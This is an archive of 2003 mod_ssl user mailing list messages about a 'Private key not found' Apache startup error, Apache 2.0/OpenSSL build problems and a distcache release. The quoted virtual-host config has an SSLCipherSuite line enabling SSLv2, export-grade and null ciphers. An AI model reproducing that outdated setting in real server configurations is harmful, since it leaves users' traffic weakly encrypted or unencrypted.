> On Thursday 06 March 2003 14:03, Justin Williams wrote:
> > was the domain moved over to your server, or did you generate
> > key/csr/crt?
> >
> > I'm having the same difficulty with one where the domain, cert and ke=
y
>
> were
>
> > transferred; all my others work properly...
> >
> > ----- Original Message -----
> > From: "A. Putnam" 
> > To: 
> > Sent: Friday, March 07, 2003 5:20 PM
> > Subject: Re: private key not found
> >
> >
> > The permissions for the server.crt file are rw-r--r-- but it still ca=
nnot
> > find
> > the Private Key.
> >
> > On Thursday 06 March 2003 13:36, Ron Gedye wrote:
> > > Please check the permissions on your private key.  They should be
> > > readable only by owner (400)
> > >
> > > (knee-jerk first guess reaction)
> > >
> > > Best of luck
> > >
> > > ----- Original Message -----
> > > From: "A. Putnam" 
> > > To: 
> > > Sent: Friday, March 07, 2003 3:42 PM
> > > Subject: private key not found
> > >
> > >
> > > I'm trying to get mod_ssl to work on my server, but each time I try=
 to
> > > restart
> > > apache with mod_ssl activated, it gives me this error:
> > >
> > > /etc/init.d/apache start returned 7 (Program is not running.)
> > > Starting httpd [ Mailman PHP4 SSL ]Apache/1.3.26 mod_ssl/2.8.10 (Pa=
ss
> > > Phrase Dialog)
> > > Some of your private key files are encrypted for security reasons.
> > > In order to read them you have to provide us with the pass phrases.
> > >
> > > Server matrix.pelathe.org:443 (RSA)
> > > Enter pass phrase:
> > > Apache:mod_ssl:Error: Private key not found.
> > > **Stopped
> > > stty: standard input: Inappropriate ioctl for device
> > > ..failed
> > >
> > > What I don't understand is how it can't find the Private key. The
> > > SSLCertificateKeyFile path in httpd.conf matches the location of th=
e
> > > key
> >
> > in
> >
> > > my directory. Isn't the SSLCertificateKeyFile the Private Key path?
> > >
> > > I'm including the Virtual Host code (sans the explination text and =
a
> > > passkey).
> > > I'm very new to this so I won't be surprised if there is a glaring
> > > error
> >
> > in
> >
> > > here that I missed...
> > >
> > > 
> > >
> > > DocumentRoot "/srv/www/htdocs"
> > > ServerName matrix.pelathe.org
> > > ServerAdmin tkitchen@pelathe.org
> > > ErrorLog /var/log/httpd/error_log
> > > TransferLog /var/log/httpd/access_log
> > >
> > > SSLEngine on
> > >
> > > SSLCipherSuite
> > > ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL
> > >
> > > SSLCertificateFile /etc/httpd/ssl.crt/server.crt
> > > #SSLCertificateFile /etc/httpd/ssl.crt/server-dsa.crt
> > >
> > > SSLCertificateKeyFile /etc/httpd/ssl.key/server.key
> > > #SSLCertificateKeyFile /etc/httpd/ssl.key/server-dsa.key
> > >
> > > SSLCertificateChainFile /etc/httpd/ssl.crt/ca.crt
> > >
> > > #SSLCACertificatePath /etc/httpd/ssl.crt
> > > SSLCACertificateFile /etc/httpd/ssl.crt/ca-bundle.crt
> > >
> > > SSLCARevocationPath /etc/httpd/ssl.crl
> > > #SSLCARevocationFile /etc/httpd/ssl.crl/ca-bundle.crl
> > >
> > > SSLVerifyClient require
> > > SSLVerifyDepth  10
> > >
> > > #
> > > #SSLRequire (    %{SSL_CIPHER} !~ m/^(EXP|NULL)/ \
> > > #            and %{SSL_CLIENT_S_DN_O} eq "Snake Oil, Ltd." \
> > > #            and %{SSL_CLIENT_S_DN_OU} in {"Staff", "CA", "Dev"} \
> > > #            and %{TIME_WDAY} >=3D 1 and %{TIME_WDAY} <=3D 5 \
> > > #            and %{TIME_HOUR} >=3D 8 and %{TIME_HOUR} <=3D 20      =
 ) \
> > > #           or %{REMOTE_ADDR} =3D~ m/^192\.76\.162\.[0-9]+$/
> > > #
> > >
> > > #SSLOptions +FakeBasicAuth +ExportCertData +CompatEnvVars
> > > +StrictRequire 
> > >     SSLOptions +StdEnvVars
> > > 
> > > 
> > >     SSLOptions +StdEnvVars
> > > 
> > >
> > > SetEnvIf User-Agent ".*MSIE.*" \
> > >          nokeepalive ssl-unclean-shutdown \
> > >          downgrade-1.0 force-response-1.0
> > >
> > > CustomLog /var/log/httpd/ssl_request_log \
> > >           "%t %h %{SSL_PROTOCOL}x %{SSL_CIPHER}x \"%r\" %b"
> > >
> > > 
> > >
> > > Any help would be greatly appreciated. I'm using Apache 1.3.26 and
> > > Mod_SSL 2.8.10 on a SuSE 8.1 box.
> > >
> > > Thanks,
> > > -Andrew
> > > ___________________________________________________________________=
___
> > > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.=
org
> > > User Support Mailing List                      modssl-users@modssl.=
org
> > > Automated List Manager                            majordomo@modssl.=
org
> > >
> > >
> > > ___________________________________________________________________=
___
> > > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.=
org
> > > User Support Mailing List                      modssl-users@modssl.=
org
> > > Automated List Manager                            majordomo@modssl.=
org

--=20
A. Putnam
Assistant IT Administrator
Pelathe Community Resource Center


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Mar  7 21:41:20 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 5CC082AA027; Fri,  7 Mar 2003 21:41:20 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from vopmail.pshift.com (mail.pshift.com [63.166.217.30])
	by master.modssl.org (Postfix) with ESMTP id C11042AA01F
	for ; Fri,  7 Mar 2003 21:41:18 +0100 (CET)
Received: from WKSJustin (unverified [63.166.217.49]) by vopmail.pshift.com
 (Vircom SMTPRS 1.4.230) with ESMTP id  for ;
 Fri, 7 Mar 2003 15:36:17 -0500
Message-ID: <009401c2e4e9$eec7a750$6700a8c0@WKSJustin>
From: "Justin Williams" 
To: 
References: <200303071542.00371.aputnam@pelathe.org> <200303081548.45720.aputnam@pelathe.org> <008101c2e4e1$2ea1ded0$6700a8c0@WKSJustin> <200303081701.51160.aputnam@pelathe.org>
Subject: Re: private key not found
Date: Fri, 7 Mar 2003 15:41:29 -0500
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2800.1106
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Justin Williams" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

don't think you can make a key from a crt...  only works the other way
around...  Tempted to do that, though...

----- Original Message -----
From: "A. Putnam" 
To: 
Sent: Saturday, March 08, 2003 6:01 PM
Subject: Re: private key not found


Oh, I see now. Well, it's nothing like that. Pelathe has had its domain
since
'98. We've had a sever that died and had to transfer everything to a new
Linux box, but this is the first time we've ever tried to make a ssl server,
so I don't think that would make a difference.

It's really strange that the crt for your transferred domain won't work
though. Maybe there is some fundamental difference between the two servers
that would cause problems? Can you just make new keys for the domain
instead?
Or is that not how it works?



On Friday 07 March 2003 13:38, Justin Williams wrote:
> I had a domain that was transferred to my server, and with it came the key
> and crt files from the old server.  That particular domain the SSL is
> blowing up...  More accurately, Apache refuses to start, with the same
> error you get, when I try to enable the SSL for that domain...
>
> ----- Original Message -----
> From: "A. Putnam" 
> To: 
> Sent: Saturday, March 08, 2003 4:48 PM
> Subject: Re: private key not found
>
>
> I'm not too sure what you mean when you ask if the domain was transferred.
> What domain? All I know I did was that I generated the key/csr/crts and
> self-signed the CA.
>
> On Thursday 06 March 2003 14:03, Justin Williams wrote:
> > was the domain moved over to your server, or did you generate
> > key/csr/crt?
> >
> > I'm having the same difficulty with one where the domain, cert and key
>
> were
>
> > transferred; all my others work properly...
> >
> > ----- Original Message -----
> > From: "A. Putnam" 
> > To: 
> > Sent: Friday, March 07, 2003 5:20 PM
> > Subject: Re: private key not found
> >
> >
> > The permissions for the server.crt file are rw-r--r-- but it still
cannot
> > find
> > the Private Key.
> >
> > On Thursday 06 March 2003 13:36, Ron Gedye wrote:
> > > Please check the permissions on your private key.  They should be
> > > readable only by owner (400)
> > >
> > > (knee-jerk first guess reaction)
> > >
> > > Best of luck
> > >
> > > ----- Original Message -----
> > > From: "A. Putnam" 
> > > To: 
> > > Sent: Friday, March 07, 2003 3:42 PM
> > > Subject: private key not found
> > >
> > >
> > > I'm trying to get mod_ssl to work on my server, but each time I try to
> > > restart
> > > apache with mod_ssl activated, it gives me this error:
> > >
> > > /etc/init.d/apache start returned 7 (Program is not running.)
> > > Starting httpd [ Mailman PHP4 SSL ]Apache/1.3.26 mod_ssl/2.8.10 (Pass
> > > Phrase Dialog)
> > > Some of your private key files are encrypted for security reasons.
> > > In order to read them you have to provide us with the pass phrases.
> > >
> > > Server matrix.pelathe.org:443 (RSA)
> > > Enter pass phrase:
> > > Apache:mod_ssl:Error: Private key not found.
> > > **Stopped
> > > stty: standard input: Inappropriate ioctl for device
> > > ..failed
> > >
> > > What I don't understand is how it can't find the Private key. The
> > > SSLCertificateKeyFile path in httpd.conf matches the location of the
> > > key
> >
> > in
> >
> > > my directory. Isn't the SSLCertificateKeyFile the Private Key path?
> > >
> > > I'm including the Virtual Host code (sans the explination text and a
> > > passkey).
> > > I'm very new to this so I won't be surprised if there is a glaring
> > > error
> >
> > in
> >
> > > here that I missed...
> > >
> > > 
> > >
> > > DocumentRoot "/srv/www/htdocs"
> > > ServerName matrix.pelathe.org
> > > ServerAdmin tkitchen@pelathe.org
> > > ErrorLog /var/log/httpd/error_log
> > > TransferLog /var/log/httpd/access_log
> > >
> > > SSLEngine on
> > >
> > > SSLCipherSuite
> > > ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL
> > >
> > > SSLCertificateFile /etc/httpd/ssl.crt/server.crt
> > > #SSLCertificateFile /etc/httpd/ssl.crt/server-dsa.crt
> > >
> > > SSLCertificateKeyFile /etc/httpd/ssl.key/server.key
> > > #SSLCertificateKeyFile /etc/httpd/ssl.key/server-dsa.key
> > >
> > > SSLCertificateChainFile /etc/httpd/ssl.crt/ca.crt
> > >
> > > #SSLCACertificatePath /etc/httpd/ssl.crt
> > > SSLCACertificateFile /etc/httpd/ssl.crt/ca-bundle.crt
> > >
> > > SSLCARevocationPath /etc/httpd/ssl.crl
> > > #SSLCARevocationFile /etc/httpd/ssl.crl/ca-bundle.crl
> > >
> > > SSLVerifyClient require
> > > SSLVerifyDepth  10
> > >
> > > #
> > > #SSLRequire (    %{SSL_CIPHER} !~ m/^(EXP|NULL)/ \
> > > #            and %{SSL_CLIENT_S_DN_O} eq "Snake Oil, Ltd." \
> > > #            and %{SSL_CLIENT_S_DN_OU} in {"Staff", "CA", "Dev"} \
> > > #            and %{TIME_WDAY} >= 1 and %{TIME_WDAY} <= 5 \
> > > #            and %{TIME_HOUR} >= 8 and %{TIME_HOUR} <= 20       ) \
> > > #           or %{REMOTE_ADDR} =~ m/^192\.76\.162\.[0-9]+$/
> > > #
> > >
> > > #SSLOptions +FakeBasicAuth +ExportCertData +CompatEnvVars
> > > +StrictRequire 
> > >     SSLOptions +StdEnvVars
> > > 
> > > 
> > >     SSLOptions +StdEnvVars
> > > 
> > >
> > > SetEnvIf User-Agent ".*MSIE.*" \
> > >          nokeepalive ssl-unclean-shutdown \
> > >          downgrade-1.0 force-response-1.0
> > >
> > > CustomLog /var/log/httpd/ssl_request_log \
> > >           "%t %h %{SSL_PROTOCOL}x %{SSL_CIPHER}x \"%r\" %b"
> > >
> > > 
> > >
> > > Any help would be greatly appreciated. I'm using Apache 1.3.26 and
> > > Mod_SSL 2.8.10 on a SuSE 8.1 box.
> > >
> > > Thanks,
> > > -Andrew
> > > ______________________________________________________________________
> > > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> > > User Support Mailing List                      modssl-users@modssl.org
> > > Automated List Manager                            majordomo@modssl.org
> > >
> > >
> > > ______________________________________________________________________
> > > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> > > User Support Mailing List                      modssl-users@modssl.org
> > > Automated List Manager                            majordomo@modssl.org

--
A. Putnam
Assistant IT Administrator
Pelathe Community Resource Center


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Mar  7 22:57:25 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 65A352AA027; Fri,  7 Mar 2003 22:57:25 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from math.gatech.edu (math.gatech.edu [130.207.146.50])
	by master.modssl.org (Postfix) with ESMTP id AB0912AA01F
	for ; Fri,  7 Mar 2003 22:57:23 +0100 (CET)
Received: from oak.math.gatech.edu (oak.math.gatech.edu [130.207.146.113])
	by math.gatech.edu (8.12.8/8.12.8) with ESMTP id h27LvIPg013142
	for ; Fri, 7 Mar 2003 16:57:18 -0500 (EST)
Date: Fri, 7 Mar 2003 16:57:18 -0500 (EST)
From: Carlos Villegas 
To: modssl-users@modssl.org
Subject: Re: private key not found
In-Reply-To: <009401c2e4e9$eec7a750$6700a8c0@WKSJustin>
Message-ID: 
References: <200303071542.00371.aputnam@pelathe.org> <200303081548.45720.aputnam@pelathe.org>
 <008101c2e4e1$2ea1ded0$6700a8c0@WKSJustin> <200303081701.51160.aputnam@pelathe.org>
 <009401c2e4e9$eec7a750$6700a8c0@WKSJustin>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
X-Spam-Level:  (0) 7 required for Spam
X-Scanned-By: MIMEDefang 2.28 (www . roaringpenguin . com / mimedefang)
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Carlos Villegas 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


On Fri, 7 Mar 2003, Justin Williams wrote:

> don't think you can make a key from a crt...  only works the other way
> around...  Tempted to do that, though...

You're right, it doesn't work the other way around. otherwise SSL would be
worthless...

It seems to me that your keys might be corrupted, my guess is that the
other server was a windows box and this one is unix (or the other way
around, but I doubt it), so you have all the end of lines messed up (with
a bunch of ^M at the end of each line or similar).

Carlos

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Mar  7 23:04:37 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id B74BC2AA02C; Fri,  7 Mar 2003 23:04:37 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from vopmail.pshift.com (mail.pshift.com [63.166.217.30])
	by master.modssl.org (Postfix) with ESMTP id EC85B2AA020
	for ; Fri,  7 Mar 2003 23:04:35 +0100 (CET)
Received: from WKSJustin (unverified [63.166.217.49]) by vopmail.pshift.com
 (Vircom SMTPRS 1.4.230) with ESMTP id  for ;
 Fri, 7 Mar 2003 16:59:30 -0500
Message-ID: <00f201c2e4f5$8f280400$6700a8c0@WKSJustin>
From: "Justin Williams" 
To: 
References: <200303071542.00371.aputnam@pelathe.org> <200303081548.45720.aputnam@pelathe.org> <008101c2e4e1$2ea1ded0$6700a8c0@WKSJustin> <200303081701.51160.aputnam@pelathe.org> <009401c2e4e9$eec7a750$6700a8c0@WKSJustin> 
Subject: Re: private key not found
Date: Fri, 7 Mar 2003 17:04:42 -0500
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2800.1106
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Justin Williams" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

oh goody...  LOL

The CA tells me it was on an Apache server, and the owner tells me it was on
a *nix system, but, with them downloading the file and tinkering, maybe
something got tinkered the wrong way...

----- Original Message -----
From: "Carlos Villegas" 
To: 
Sent: Friday, March 07, 2003 4:57 PM
Subject: Re: private key not found


>
> On Fri, 7 Mar 2003, Justin Williams wrote:
>
> > don't think you can make a key from a crt...  only works the other way
> > around...  Tempted to do that, though...
>
> You're right, it doesn't work the other way around. otherwise SSL would be
> worthless...
>
> It seems to me that your keys might be corrupted, my guess is that the
> other server was a windows box and this one is unix (or the other way
> around, but I doubt it), so you have all the end of lines messed up (with
> a bunch of ^M at the end of each line or similar).
>
> Carlos
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Mar  8 02:46:46 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 625512AA034; Sat,  8 Mar 2003 02:46:46 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from lytehouse.net (209-183-162-200.x.newroadstelecom.net [209.183.162.200])
	by master.modssl.org (Postfix) with ESMTP id CDF522AA015
	for ; Sat,  8 Mar 2003 02:46:42 +0100 (CET)
Received: from smtp.lytehouse.net (smtp.lytehouse.net [209.183.162.200])
	by lytehouse.net (8.12.5/8.12.5) with ESMTP id h281kdea022602
	for ; Fri, 7 Mar 2003 19:46:40 -0600
Date: Fri, 7 Mar 2003 19:46:35 -0600 (CST)
From: Ted Rolle 
X-X-Sender: ted@localhost.localdomain
To: "'modssl-users@modssl.org'" 
Subject: RE: Apache 2.0.44 with Openssl -0.9.7
In-Reply-To: 
Message-ID: 
References: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Ted Rolle 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Good.  Now what is the configuration file for OpenSSL?

On Fri, 7 Mar 2003, Yu, Ming wrote:

> I use the following switches to compile APACHE 2.0.44 with OpenSSL 0.9.7
> ../configure --enable-layout=TEST \
> 		--enable-ssl \
> 		--with-ssl=/usr/local/ssl \
> 		--enable-mods-shared=max \
> 		--enable-modules=most \
> 		--with-mpm=worker
>
> It went through the installation process.
>
> Thanks
>
> - Ming Yu
>
> -----Original Message-----
> From: Ted Rolle [mailto:ted@php.net]
> Sent: Friday, March 07, 2003 10:36 AM
> To: modssl-users@modssl.org
> Subject: Re: Apache 2.0.44 with Openssl -0.9.7
>
>
> YOU GOT Apache-2.0.44 and OpenSSL-0.9.7 WORKING???
> What are your ./configure files like?  I keep getting the dreaded "can't
> find X509_free" message.
>
> On Fri, 7 Mar 2003, Ian Miller wrote:
>
> >
> > Did you uncomment out the entropy lines in the ssl.conf file? I am
> > running it with 0.9.7a and it works fine -Ian
> > Quoting "Yu, Ming" :
> >
> > > Does anyone have problem with apache 2.0.44 and Openssl 0.9.7. I
> > > installed the server, no problem.  Then I wanted to start the httpd
> > > server, even without mod_ssl.
> > >
> > > ./apachectl -k start
> > >
> > > There is no message on the screen, but an error message in the log
> > > file. The apache engine did not start.
> > >
> > > [warn] Init: PRNG still contains insufficient entropy! [error] Init:
> > > Failed to generate temporary 512 bit RSA private key Configuration
> > > Failed
> > >
> > > Any suggestions.
> > >
> > > - Ming Yu
> > > ______________________________________________________________________
> > > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> > > User Support Mailing List                      modssl-users@modssl.org
> > > Automated List Manager                            majordomo@modssl.org
> > >
> >
> >
> > --
> > Ian Miller
> > Sr. Systems Engineer
> > University of Chicago
> > imiller@bsd.uchicago.edu
> > ______________________________________________________________________
> > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> > User Support Mailing List                      modssl-users@modssl.org
> > Automated List Manager                            majordomo@modssl.org
> >
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Mar  8 02:48:04 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id ED4F12AA04B; Sat,  8 Mar 2003 02:48:03 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from lytehouse.net (209-183-162-200.x.newroadstelecom.net [209.183.162.200])
	by master.modssl.org (Postfix) with ESMTP id E85832AA038
	for ; Sat,  8 Mar 2003 02:48:01 +0100 (CET)
Received: from smtp.lytehouse.net (smtp.lytehouse.net [209.183.162.200])
	by lytehouse.net (8.12.5/8.12.5) with ESMTP id h281lxea022610
	for ; Fri, 7 Mar 2003 19:47:59 -0600
Date: Fri, 7 Mar 2003 19:47:57 -0600 (CST)
From: Ted Rolle 
X-X-Sender: ted@localhost.localdomain
To: modssl-users@modssl.org
Subject: RE: Apache 2.0.44 with Openssl -0.9.7
In-Reply-To: 
Message-ID: 
References: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Ted Rolle 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Yes, this is true. But DSO should work too.

On Fri, 7 Mar 2003, apachep2 wrote:

> Of course. When you build mod_ssl into apache (that is STATIC), you
> won't encounter X509_free issue.
>
> -----Original Message-----
> From: owner-modssl-users@modssl.org
> [mailto:owner-modssl-users@modssl.org] On Behalf Of Yu, Ming
> Sent: March 7, 2003 10:57 AM
> To: 'modssl-users@modssl.org'
> Subject: RE: Apache 2.0.44 with Openssl -0.9.7
>
> I use the following switches to compile APACHE 2.0.44 with OpenSSL 0.9.7
> ../configure --enable-layout=TEST \
> 		--enable-ssl \
> 		--with-ssl=/usr/local/ssl \
> 		--enable-mods-shared=max \
> 		--enable-modules=most \
> 		--with-mpm=worker
>
> It went through the installation process.
>
> Thanks
>
> - Ming Yu
>
> -----Original Message-----
> From: Ted Rolle [mailto:ted@php.net]
> Sent: Friday, March 07, 2003 10:36 AM
> To: modssl-users@modssl.org
> Subject: Re: Apache 2.0.44 with Openssl -0.9.7
>
>
> YOU GOT Apache-2.0.44 and OpenSSL-0.9.7 WORKING???
> What are your ./configure files like?  I keep getting the dreaded "can't
> find X509_free" message.
>
> On Fri, 7 Mar 2003, Ian Miller wrote:
>
> >
> > Did you uncomment out the entropy lines in the ssl.conf file? I am
> > running it with 0.9.7a and it works fine -Ian
> > Quoting "Yu, Ming" :
> >
> > > Does anyone have problem with apache 2.0.44 and Openssl 0.9.7. I
> > > installed the server, no problem.  Then I wanted to start the httpd
> > > server, even without mod_ssl.
> > >
> > > ./apachectl -k start
> > >
> > > There is no message on the screen, but an error message in the log
> > > file. The apache engine did not start.
> > >
> > > [warn] Init: PRNG still contains insufficient entropy! [error] Init:
>
> > > Failed to generate temporary 512 bit RSA private key Configuration
> > > Failed
> > >
> > > Any suggestions.
> > >
> > > - Ming Yu
> > >
> ______________________________________________________________________
> > > Apache Interface to OpenSSL (mod_ssl)
> www.modssl.org
> > > User Support Mailing List
> modssl-users@modssl.org
> > > Automated List Manager
> majordomo@modssl.org
> > >
> >
> >
> > --
> > Ian Miller
> > Sr. Systems Engineer
> > University of Chicago
> > imiller@bsd.uchicago.edu
> > ______________________________________________________________________
> > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> > User Support Mailing List                      modssl-users@modssl.org
> > Automated List Manager                            majordomo@modssl.org
> >
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Mar  9 23:33:59 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 53C042AA037; Sun,  9 Mar 2003 23:33:59 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from VL-MS-MR001.sc1.videotron.ca (relais.videotron.ca [24.201.245.36])
	by master.modssl.org (Postfix) with ESMTP id 9F0982AA01F
	for ; Sun,  9 Mar 2003 23:33:53 +0100 (CET)
Received: from steerpike.geoffthorpe.net ([24.202.196.90])
 by VL-MS-MR001.sc1.videotron.ca
 (iPlanet Messaging Server 5.2 HotFix 1.10 (built Jan 23 2003))
 with SMTP id <0HBI00GU96M8TT@VL-MS-MR001.sc1.videotron.ca> for
 modssl-users@modssl.org; Sun, 09 Mar 2003 17:32:34 -0500 (EST)
Received: by steerpike.geoffthorpe.net (sSMTP sendmail emulation); Sun,
 09 Mar 2003 17:32:14 -0500
Date: Sun, 09 Mar 2003 17:32:14 -0500
From: Geoff Thorpe 
Subject: [ANNOUNCE] distcache 0.4pre1 released
To: Modssl Users List 
Message-id: <20030309223214.GF1906@grumpy.geoffnet>
X-Info: http://www.geoffthorpe.net
MIME-version: 1.0
Content-type: text/plain; charset=us-ascii
Content-transfer-encoding: 7BIT
Content-disposition: inline
User-Agent: Mutt/1.4i
X-Editor: Vim http://www.vim.org/
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Geoff Thorpe 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi all,

I won't inline any giant ANNOUNCE files, if you're interested in
distributed session caching with Apache/mod_ssl, please wander to the
project home page where you can find the release, CHANGES notes, support
packages for Apache 1.3 (with mod_ssl) and Apache 2, and all sorts of
other associated stuff;

    http://www.distcache.org/

Note that I've also uploaded (experimental) RPM packages - I'd
appreciate any comments from users of RPM-based systems as I'm new to
RPM building and feedback would be a huge help.

Cheers,
Geoff

-- 
Geoff Thorpe
geoff@geoffthorpe.net
http://www.geoffthorpe.net/

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Mar 10 11:42:55 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id AA8022AA047; Mon, 10 Mar 2003 11:42:54 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from xmxpita.myway.com (nn1.excitenetwork.com [207.159.120.55])
	by master.modssl.org (Postfix) with ESMTP id D5DCF2AA015
	for ; Mon, 10 Mar 2003 11:42:52 +0100 (CET)
Received: by xmxpita.myway.com (Postfix, from userid 110)
	id 91B5D39D7; Mon, 10 Mar 2003 05:42:38 -0500 (EST)
To: modssl-users@modssl.org
Subject: Re: private key not found
Received: from [194.201.150.100] by mprdmailfe3.nwk.myway.com via HTTP; Mon, 10 Mar 2003 05:42:38 EST
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: ID = 427ca1860f709c6c72e7c11ebe29e70d
From: "camun2020" 
MIME-Version: 1.0
X-Sender: camun2020@myway.com
X-Mailer: PHP
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit
Cc: 
Message-Id: <20030310104238.91B5D39D7@xmxpita.myway.com>
Date: Mon, 10 Mar 2003 05:42:38 -0500 (EST)
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "camun2020" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users



>1 out of 1 certificate requests certified, commit? [y/n]y
>Write out database with 1 new entries
>ata Base Updated
>CA verifying: server.crt <-> CA cert
>server.crt: /C=US/ST=Kansas/L=Lawrence/O=Pelathe 
>Center/CN=www.pelathe.org/Email=tkitchen@pelathe.org
>error 18 at 0 depth lookup:self signed certificate
>/C=US/ST=Kansas/L=Lawrence/O=Pelathe 
>Center/CN=www.pelathe.org/Email=tkitchen@pelathe.org
